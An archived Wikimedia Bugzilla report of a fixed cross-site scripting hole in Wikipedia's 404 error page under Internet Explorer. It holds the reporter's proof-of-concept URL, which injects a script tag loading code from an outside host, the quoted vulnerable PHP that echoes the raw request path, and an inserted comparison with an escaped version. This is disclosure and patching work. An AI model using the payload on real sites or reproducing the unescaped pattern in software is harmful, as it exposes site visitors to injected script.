Last modified: 2013-05-20 19:21:06 UTC

Wikimedia Bugzilla is closed!

Wikimedia migrated from Bugzilla to Phabricator. Bug reports are handled in Wikimedia Phabricator.
This static website is read-only and for historical purposes. It is not possible to log in and except for displaying bug reports and their history, links might be broken. See T50380, the corresponding Phabricator task for complete and up-to-date bug report information.
Bug 48380 - XSS vulnerability in 404 error page in IE
Status: RESOLVED FIXED
Product: Wikimedia
Classification: Unclassified
Component: General/Unknown (Other open bugs)
Version: unspecified
Hardware: All
OS: All
Importance: Unprioritized normal
Target Milestone: ---
Assigned To: Chris Steipp
Depends on:
Blocks:
Reported: 2013-05-12 15:31 UTC by Masato Kinugawa
Modified: 2013-05-20 19:21 UTC (History)
CC List: 7 users

See Also:
Web browser: Internet Explorer
Mobile Platform: ---
Assignee Huggle Beta Tester: ---


Attachments
Escape $matches[1] before output (1.14 KB, patch)
2013-05-13 19:27 UTC, Chris Steipp
Details

Description Masato Kinugawa 2013-05-12 15:31:10 UTC
It works on IE.
PoC is: http://en.wikipedia.org/w/a?"src=//l0.cm></script><script/id="
Comment 1 Andre Klapper 2013-05-13 11:23:10 UTC
Hi Masato, thanks a lot for taking the time to report this!

Confirming for Internet Explorer only.
No popup for Firefox 18, Opera 12.14 and Google Chrome 26 on Fedora Linux.
No popup for Firefox 18, Opera 12.12 on Windows XP SP3.

When I try the given URL with Microsoft Internet Explorer 8 on Microsoft Windows XP SP3, I get the "Error 404 - File not found" page, but also a popup saying:

     Message from webpage
     1

The 404 page says:

     Error
     404 - File not found
     http://en.wikipedia.org/w/a?"src=//l0.cm></script><script/id="
     We could not find the above page on our servers.
     To check for "a?"src=//l0.cm>

Note the truncated URL. All other tested browsers show the following (full and also correctly URL-encoded) output on the 404 page:

     Error
     404 - File not found
     http://en.wikipedia.org/w/a?"src=//l0.cm></script><script/id="
     We could not find the above page on our servers.
     To check for "a?%22src=//l0.cm%3E%3C/script%3E%3Cscript/id=%22"
     on Wikipedia, see: //en.wikipedia.org/wiki/a?
     %22src=//l0.cm%3E%3C/script%3E%3Cscript/id=%22
     Alternatively, you can visit the Main Page or read 
     more information about this type of error.
     A project of the Wikimedia Foundation
Comment 2 Chris Steipp 2013-05-13 19:21:00 UTC
Looks like it's coming from 404.php:

// $loc is taken from $_SERVER["REQUEST_URI"] and is not escaped anywhere below.
if( preg_match( "|(%2f)|i", $loc, $matches ) ||
    preg_match( "|^/upload/(.*)|i", $loc, $matches ) ||
    preg_match( "|^/style/(.*)|i", $loc, $matches ) ||
    preg_match( "|^/wiki/(.*)|i", $loc, $matches ) ||
    preg_match( "|^/w/(.*)|i", $loc, $matches ) ||
    preg_match( "|^/extensions/(.*)|i", $loc, $matches ) ) {
    // $matches[1] is the raw request path/query and lands in HTML text,
    // an attribute value and an href without any escaping.
    $title = $matches[1];
    $details = "<p style=\"font-weight: bold;\">To check for \"$title\" on Wikipedia, see: 
                <a href=\"//en.wikipedia.org/wiki/$title\" title=\"Wikipedia:$title\">
                //en.wikipedia.org/wiki/$title</a></p>";
}

Since $loc comes directly from $_SERVER["REQUEST_URI"] without escaping, $matches[1] needs to be escaped.
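The following is an added example, not the 404.php from the bug or the attached patch: it places the unescaped construction quoted in comment 2 next to a hardened version that escapes $matches[1] once for each output context it lands in (HTML text, an attribute value, and the URL in the href). The function names, the helper structure and the sample request URI are assumptions made for this illustration; the input deliberately contains a double quote and angle brackets, the characters comment 1 shows IE sending through without percent-encoding.

```php
<?php
// Added example (not 404.php itself). Mirrors the match step from comment 2
// and shows the title being escaped per output context. Names are assumed.

function extractTitle(string $loc): ?string {
    // Same set of patterns as the snippet quoted in comment 2;
    // $loc stands in for $_SERVER["REQUEST_URI"].
    if ( preg_match( "|(%2f)|i", $loc, $matches ) ||
         preg_match( "|^/upload/(.*)|i", $loc, $matches ) ||
         preg_match( "|^/style/(.*)|i", $loc, $matches ) ||
         preg_match( "|^/wiki/(.*)|i", $loc, $matches ) ||
         preg_match( "|^/w/(.*)|i", $loc, $matches ) ||
         preg_match( "|^/extensions/(.*)|i", $loc, $matches ) ) {
        return $matches[1];
    }
    return null;
}

// Vulnerable shape: $title is interpolated raw into text, an attribute and an href.
function detailsVulnerable(string $title): string {
    return "<p style=\"font-weight: bold;\">To check for \"$title\" on Wikipedia, see: "
         . "<a href=\"//en.wikipedia.org/wiki/$title\" title=\"Wikipedia:$title\">"
         . "//en.wikipedia.org/wiki/$title</a></p>";
}

// Hardened shape: one escaping step per context.
function detailsEscaped(string $title): string {
    // HTML text and attribute context: ENT_QUOTES escapes both " and '.
    $html = htmlspecialchars( $title, ENT_QUOTES, 'UTF-8' );
    // URL context: percent-encode the path bytes first, then escape the
    // result again because it is emitted inside an attribute value.
    $url  = htmlspecialchars( '//en.wikipedia.org/wiki/' . rawurlencode( $title ),
                              ENT_QUOTES, 'UTF-8' );
    return "<p style=\"font-weight: bold;\">To check for \"$html\" on Wikipedia, see: "
         . "<a href=\"$url\" title=\"Wikipedia:$html\">$url</a></p>";
}

// Constructed request URI (not from the report): a quote and angle brackets
// as a browser that does not percent-encode the query string would send them.
$loc   = '/w/a?"><b>bold</b>';
$title = extractTitle( $loc );          // 'a?"><b>bold</b>'

// In the first line the <b> element survives into the markup; in the second
// the quote and brackets arrive as &quot; &gt; &lt; and are rendered as text.
echo detailsVulnerable( $title ), "\n";
echo detailsEscaped( $title ), "\n";
```

Two points worth keeping in mind when adapting this: rawurlencode also encodes "/" and ":", so a title containing a subpage slash will reach the wiki percent-encoded rather than as a path segment (the wiki still resolves it, but a deployment may prefer to leave "/" alone); and the "%2f" pattern, kept from the original, returns the literal string "%2f" as the title, which is harmless after escaping but is a quirk of the match order rather than intended behaviour.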
Comment 3 Chris Steipp 2013-05-13 19:27:48 UTC
Created attachment 12303 [details]
Escape $matches[1] before output
Comment 4 Sam Reed (reedy) 2013-05-20 19:07:19 UTC
https://gerrit.wikimedia.org/r/#/c/64617/
